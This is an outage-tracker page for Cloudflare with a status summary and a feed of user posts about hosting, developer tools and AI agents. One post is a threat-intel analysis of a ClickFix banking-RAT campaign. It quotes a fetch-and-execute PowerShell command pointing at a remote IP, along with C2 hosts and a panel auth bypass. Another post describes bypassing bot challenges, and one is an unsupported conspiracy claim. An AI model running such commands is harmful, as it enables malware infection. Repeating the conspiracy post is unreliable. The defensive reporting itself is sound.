Cloudflare status: hosting issues and outage reports
No problems detected
If you are having issues, please submit a report below.
Cloudflare is a company that provides DDoS mitigation, content delivery network (CDN) services, security and distributed DNS services. Cloudflare's services sit between the visitor and the Cloudflare user's hosting provider, acting as a reverse proxy for websites.
Problems in the last 24 hours
The graph below depicts the number of Cloudflare reports received over the last 24 hours by time of day. When the number of reports exceeds the baseline, represented by the red line, an outage is determined.
At the moment, we haven't detected any problems at Cloudflare. Are you experiencing issues or an outage? Leave a message in the comments section!
Most Reported Problems
The following are the most recent problems reported by Cloudflare users through our website.
- Domains (39%)
- Cloud Services (27%)
- Hosting (15%)
- Web Tools (12%)
- E-mail (6%)
Live Outage Map
The most recent Cloudflare outage reports came from the following cities:
| City | Problem Type | Report Time |
|---|---|---|
|
|
Domains | 8 days ago |
|
|
Cloud Services | 19 days ago |
|
|
Domains | 21 days ago |
|
|
Hosting | 1 month ago |
|
|
1 month ago | |
|
|
Web Tools | 1 month ago |
Community Discussion
Tips? Frustrations? Share them here. Useful comments include a description of the problem, city and postal code.
Beware of "support numbers" or "recovery" accounts that might be posted below. Make sure to report and downvote those comments. Avoid posting your personal information.
Cloudflare Issues Reports
Latest outage, problems and issue reports in social media:
-
FEKU (@fekuuuu) reportedBots just outnumbered humans on the open web 🤖 Cloudflare: 57%+ of all HTTP traffic is now automated. AI agent traffic grew 7,851% in a single year - a shift Matthew Prince expected by 2027, not June 2026. Most internet infrastructure still assumes a human is on the other end of every request. That assumption just broke. @ionet Agent Cloud was built for exactly this - AI agents renting GPU compute autonomously through MCP, no human approval, no login required. The web didn't get more crowded. It got a new primary user ⚡
-
Hunter Bertoson (@BertosonHunter) reported@jamesqquick Watched the network tab, reverse-engineered an undocumented API, and turned it into a Cloudflare Worker that catches failed attendance syncs and emails an alert every night. Workers + cron is unreasonably good for this kind of thing.
-
sunil pai (@threepointone) reportedis there interest in a 4k+ word deep dive in building reliable agent loops (on cloudflare and elsewhere) writing down what I've done for building agents resilient to catastrophic failures on clients/servers/inference (with zero user code) and I need to get it out of my brain
-
DFIR Radar (@DFIR_Radar) reportedAI-generated ClickFix lure impersonates a Brazilian 🇧🇷 bank to drop SmartRAT, a PowerShell banking RAT with QR-swap, keylogging, and fake overlay capabilities. The C2 panel had no server-side auth. Key findings: - Full infection chain: typosquatting domain cartaobb[.]com mimics cartaobrb[.]com[.]br, fake Cloudflare CAPTCHA triggers clipboard injection, fake BSOD locks the browser, then victim pastes: powershell "$k8='hxxp://64[.]95[.]13[.]238/st.txt';iex(irm $k8)" into Run. Three-stage PowerShell dropper pulls payload[.]php, AES-CBC decrypts SmartRAT in memory. Hashes: st.txt 297eb45f028d44d750297d2f932b9c91, RAT b17ccdb5531555e43f082d6e77c07227. - SmartRAT (SMART_V25) persists as scheduled task or Windows service named MicrosoftEdgeUpdateCore (T1543.003), copies itself to %APPDATA%\Microsoft\Diagnosis\ETW\msedgeupdate.txt, logs all activity to C:\ProgramData\Microsoft\Diagnosis\ETW\client_debug.log and per-PID logs. - C2 at c[.]windowsupdate-cdn[.]com port 51888 (fallback 162[.]141[.]111[.]227), AES-CBC encrypted over raw TCP. QR-swap feature overlays attacker QR at exact pixel coordinates of the legitimate banking QR to redirect transactions. Monitors window titles for santander, bradesco, itau, nubank, binance, and a dozen more. - The C2 panel (branded MyGood PRO) bypasses auth by checking only localStorage values authToken and currentUser client-side with no server validation, exposing the full admin panel to anyone who sets those keys. #DFIR_Radar
-
Elizabeth (@Sounsmooth) reported@FBIPhiladelphia In Georgia they inputted Datalayers to cache and control. They then gather DNS and block the original government domain. They create a clone using Cloudflare London and Amazon. Then they wait 7 days. . . You know why. Then they activate it and viola a compromised Amazon fake government domain using a pre appointed L3 contractor who hired DEI employees are at the wheel with IT who ask the REF NAMED “Raj” Z and Kash’s buddy, who to blame for breaches is the GSA Zone 4 IC3. Kash Patel knows as do the IT volunteers. The China leak biz continues and RICO and bad guys thrive. AMERICANS LOSE. True story.
-
Otto Lorner (@OttoLorner) reportedBest OpenClaw use case is making it an admin in AWS, Google Cloud, Cloudflare, wherever and never having to use their horrendous UIs again. Cloud consultant on tap.
-
Jose (@SolutionsCay) reportedTwo changes to how I work with agents: 1. GitHub App so the agents manage issues directly. Keeps the repo clear of throwaway spec and todo files. 2. EmDash (Cloudflare's serverless WordPress successor) for internal docs. Runs on D1, just SQLite under the hood, so I can export the content and move it anywhere. No more docs sprawl.
-
John Doe (@StanleyMasinde_) reported@SamProgramiz I’m glad you’re now seeing that Rust is not babysitting programmers on line one. It just makes you acknowledge your mistake. A panic caused a Cloudflare outage earlier this year. On paragraph 2, Rust will not even compile. Yes memory safety goes beyond nulls. If the language doesn’t handle an illegal reference, the hardware will send an interrupt and the kernel will kill the entire program. Now imagine you have. // processing some stuff Foo() passes bar() fails with an interrupt or NPE fizz() is completely skipped. Your program just corrupted data because null possibility was ignored.
-
Pablodecortes (@pablodecortes) reported@cramforce Does it support Cloudflare Workers or only Vercel?
-
CAPED CRUSADER🦇 (@stilleclectic) reported@matthansbello Sigh, everything was originally done on namecheap but I’ve now just moved the dns to cloudflare. Waiting to see if that fixes the issue
-
Mundo Trading (@DonPepeVaquito) reportedIs cloudflare down or it's just me?
-
15 dollars (@WildWhy_v3_44) reportedis cloudflare down or does RYM just not like me
-
KarenR (@heykarenrc) reportedWhen I built d1-studio, I was still early in my transition from UX to development. At first, I just wanted the simplest stack possible. Something lean. Something affordable. Something I could build with fast. Like many new devs, I started with the familiar stack: Next.js. Supabase. Vercel. AI helping me along the way. Supabase was great to get started. I still like it. But as I built more products, I started noticing the small costs and tradeoffs that you only understand after shipping. Storage. Egress. Deployment limits. The usual “newbie learns the hard way” stuff. That pushed me to look for a stack that fit how I wanted to build. Then I found Cloudflare. Workers. Pages. D1. R2. Queues. Generous free tier. Simple deployment. Close to the edge. I slowly moved more of my projects there and never really looked back. But there was one thing that kept slowing me down: Cloudflare D1 local development. D1 is great, but working with the database locally felt too slow. I didn’t want to keep jumping between CLI commands just to inspect tables, edit rows, run SQL, or check data while building. I also didn’t want a tool that required a long setup. My thinking was simple: The database is already in my Cloudflare project. The wrangler.toml is already there. Why can’t a studio just detect it and work? That became the trigger for D1 Studio. A native database studio for Cloudflare D1. No complicated setup. No extra database connection string. No heavy workflow. Just run it inside your project and start working with your D1 database faster. You can inspect tables, edit data, run SQL, and work with local or remote D1 without fighting the CLI every few minutes. It started as a tool I needed for myself. Now it’s getting used by other Cloudflare developers too. This week it hit 311 weekly downloads. Not a huge number in the grand scheme of things, but for me it means a lot. Because this is the first product I built that truly came from my own pain. Not a random idea. Not a trend. Not something I forced. Just a problem I kept hitting until I finally built the tool I wished existed. That’s been the biggest lesson for me as I move from design into development: The best products are often not born from brainstorming. They come from friction. Something feels slower than it should. Something takes too many steps. Something breaks your flow. And eventually you think: “There has to be a better way.” That’s how D1 Studio started. And seeing people use it for their own Cloudflare projects is still one of the best feelings.
-
Agrit Tiwari (@agrit_tiwari) reportedWorlds are a good concept but we need a bridge built by both sides of @vercel and @Cloudflare world. Even workflows has a long PR pending just to support the wasm runtime for running workflow SDK on Cloudflare. But they are continuously innovating with frontier stances on agent stack.
-
Luca Steeb (@steebchen) reported@baanish @fayazara it's actually not true, you can use the CloudFlare AI gateway by setting it up in the dashboard and you'll get an URL which works with any SDK or library. however, personally I recommend to use @llmgateway as we support the full catalog of models and DevPass coding plan for 3x usage
-
Lachlan (@lynx769) reported@EddCoates Are you using Cloudflare in front of it? It should help.
-
bigdatachads (@bigdatachads) reportedI've been building AI phone agents on @Cloudflare for a while now. v1. a Python container, fighting for every millisecond. v2. no container, the whole call on the edge. that was the real work. now that I have the stack down, I spent last weekend messing around. this is v3, a cartoon you talk to that remembers you and gets heckled by a second AI. all on Cloudflare primitives. three teardowns, first one tomorrow. follow along. @CloudflareDev
-
Shantanu Landore (@ShantanuVL) reported@itsasmolsush Oof well my non tech tech company has everything set up over cloudflare so we need to log in with MFA once a day... and the prompt to login comes at the worst point of the day everyday so
-
Brandon Bedford (@wealthpotion) reported"Claude is down" is the new "Cloudflare is down" except way worse.
-
Wallstreet Dragon (@longwashere) reportedDD: Long term holdings. $NET cloudflare and why it's important in the age of agents ELI5: The world is moving towards agent. Big industries need better cloud bot protection, developers need LLM computing on the edge. Cloudflare provides the most afforadable option for both, even heavy aws users are using cloudflare for these purposes. What is Cloudflare? For the technically challenged or pre-med professionals, Cloudflare is a web infrastructure and security company that acts as a protective, performance-enhancing shield between a website and its visitors by providing services like content delivery networks (CDNs), DDoS mitigation, and secure domain routing. TL;DR: For the simple folks, it's that **** that pops up with the CAPTCHA to make sure you're not a bot. For developers, it's that **** that makes your sites fast and secure from bots. What is Cloudflare's growing revenue? Application Security and Content Delivery Network (CDN). What is a Content Delivery Network? A CDN is basically a network of servers used to store files closer to its users for faster retrieval. Imagine an app creates a backend database storing all its images on AWS based in US-East. A CDN will then copy the most commonly used images in that S3 database and duplicate them across multiple regions (Asia, Europe, US-East). When an app makes a service request, it will make the request to Cloudflare first. Cloudflare then uses its internal logic to determine if the data needed is in a nearby Cloudflare edge server (on the edge) or if it needs to get it from the main database in US-East. This is called storage on the edge. This CDN mechanism is a relic of Web 2.0, but it will become significantly more important in the age of AI. Now, instead of storing images, large AI providers will be storing entire LLM contexts on the edge. So instead of training specialized ML models to do a specific task, app companies can use a general-usage LLM with a stored context for that specific task, and it will be fast, too. This mechanism is called Prefix Caching or Prompt Caching. By doing this, it makes the LLM responses almost instantaneous. So all your consumer apps that use LLMs—like CALai, Duolingo, Grok, etc.—are most likely already using this process. Beyond simply storing data on the edge, the industry is shifting toward deploying entire servers and specialized AI models locally. A major component of this architecture relies on LLM routing. Instead of hosting massive, resource-heavy models on every single edge device or regional server, companies are deploying highly optimized, lightweight router models at the edge. These local routers analyze incoming user prompts to determine the most efficient way to handle them. If a task is simple, the edge model processes it instantly to minimize latency and eliminate cloud compute costs. If the task requires deep reasoning or a massive knowledge base, the router intelligently forwards the request to a larger cloud-hosted model. Additionally, these edge routers leverage tool calling, which allows them to execute local APIs, query regional databases, or trigger specific code workflows without needing to round-trip back to a centralized data center. Moving from simple edge storage to localized edge intelligent compute represents a massive paradigm shift. It allows enterprises to scale AI applications efficiently, safeguard data privacy, and drastically slash infrastructure costs. Cloudflare Security in the Age of Agents This one is simple. You know that Cloudflare CAPTCHA that pops up when you're entering a website or checking out with a credit card? Websites PAY for that CAPTCHA. And they pay a lot. These features block spam, bots, and DDoS attacks. When you move your mouse to click the CAPTCHA, Cloudflare uses proprietary logic that determines you're human by calculating how fast your mouse moved, the angle you moved it, how long you waited, and any other actions you took. Sometime in the 2010s, every website figured out that paying for this small puzzle CAPTCHA was more cost-effective than getting DDoS'd by bots, so almost every single site adopted it. The CAPTCHA is only one of Cloudflare's products in its security suite to block bots from websites, but the overarching theme is the same for all its features: blocking bots. Well, it's 2026 now, and web traffic across the board has increased, mostly driven by AI and AI agents. Automated web traffic has increased by 600% in 2026 alone. Guess who is positioned perfectly for this? Cloudflare. Not only is Cloudflare blocking bot traffic, but it's also getting paid by them. Cloudflare is releasing a new product (Pay Per Crawl) that allows website owners and Cloudflare to get paid for LLMs crawling their content. Cloudflare is simply winning by creating the gates for web traffic and now charging a toll fee for bots to use them. Cloudflare is direct play on internet traffic, which is a correlating play on ai agents and LLM adoption and usage. If you think people will continue to use ai agents and LLM, then cloudflare is your guy. Cloudflare valuation has dropped recently because of the layoffs due to ai, even though revenue has sped up. This drop was more of emotional sell off than a fundamental one. It's valuation has already bounced back. (Cloudflare is trading at 235 as of this post, I bought in earlier in the 190s for a swing trade after the bogus layoff dips, wish i bought in more)
-
I..A..N..S (@IANSYT) reported@ATTHelp can you tell someone on network engineering to look into high RTT and loss on the ATT-Cloudflare interconnect in dallas AS7018 <-> AS13335 because this is unacceptable, < 1Mbit/s speeds sustained for over a week now
-
Armeet (@armeetjatyani) reported@tomhaerter Primarily Cloudflare now. GCP support is extremely sluggish
-
Ragnarok013 (@Ragnarok013) reported@4nt1p4tt3rn That's a nice coincidence, I'm already using pihole and cloudflare. I wondered if they was something more that could help up my network game.
-
Your Private Proxy (@YourPrivateProx) reported@lea7hersm17h FlareSolverr clears the JS challenge. It doesn't fix IP reputation — if your exit is already flagged, Cloudflare just serves another challenge after each solve. Works on clean IPs at low scale. Breaks on shared or abused exits.
-
Ryan K 🌥 (@Yank) reported@tebayoso @Cloudflare Sorry to hear that. Do you have a case or ticket number from support?
-
Elyas (@ElyasAlemi) reported@steipete We hit this in our n8n workflows. PDF intake is slow (Cloudflare queue, async), Supabase lookups are fast. Treating them as different shapes from the start saved a lot of rework. are you running the slow side on a queue or polling?
-
Karl Emil Nikka (@KarlEmilNikka) reported@Cloudflare Nice! Do you have any ETA for sub-domain support?
-
wast3 (@0xWast3) reportedA DEVELOPER BUILT AN ENGINEERING SITE FOR A CORPORATE CLIENT AND CHARGED $3,200 FOR IT the hosting bill was $0, the domain was $0, the SSL was $0 he registered a free domain on DigitalPlat, pointed it at Cloudflare in twenty minutes, and deployed the site on Cloudflare Pages the client saw a live URL with a padlock and never asked what it cost to run here's the full stack he used: DigitalPlat free domain - no card, no renewal creep Cloudflare free plan - DNS, CDN, DDoS protection, SSL auto-issued Cloudflare Pages - connected to GitHub, builds and deploys automatically total infrastructure cost: $0, managed from one dashboard the mistake most developers make is paying three companies on three renewal cycles for every experiment they ship once the stack was locked, every new client demo went live in fifteen minutes $3,200 charged, $0 spent on infrastructure the margin was the entire point register first, deploy second, invoice third
-
FILM DB | ۗۗۗۗۗۗۗۗۗۗۗۗۗۗۗۗۗۗۗۗۗۗۗۗh (@FemiSuccess7) reported@OzorNdiOzor Yankee businesses know how to run a business properly I made a mistake with one of my websites on Cloudflare and made over 60 billion database writes in a month that become like $80 of bill to clear, I texted their support and explained to them and they cut it to $6 immediately!
-
Christopher Johnson (@cj_enlighten) reportedVanilla web search in an always-on agent gets blocked. Not a Hermes bug. A structural 2026 problem. Cloudflare and Akamai are aggressive enough now that any general-purpose agent hits the wall. You need Tavily or equivalent. Budget time for it.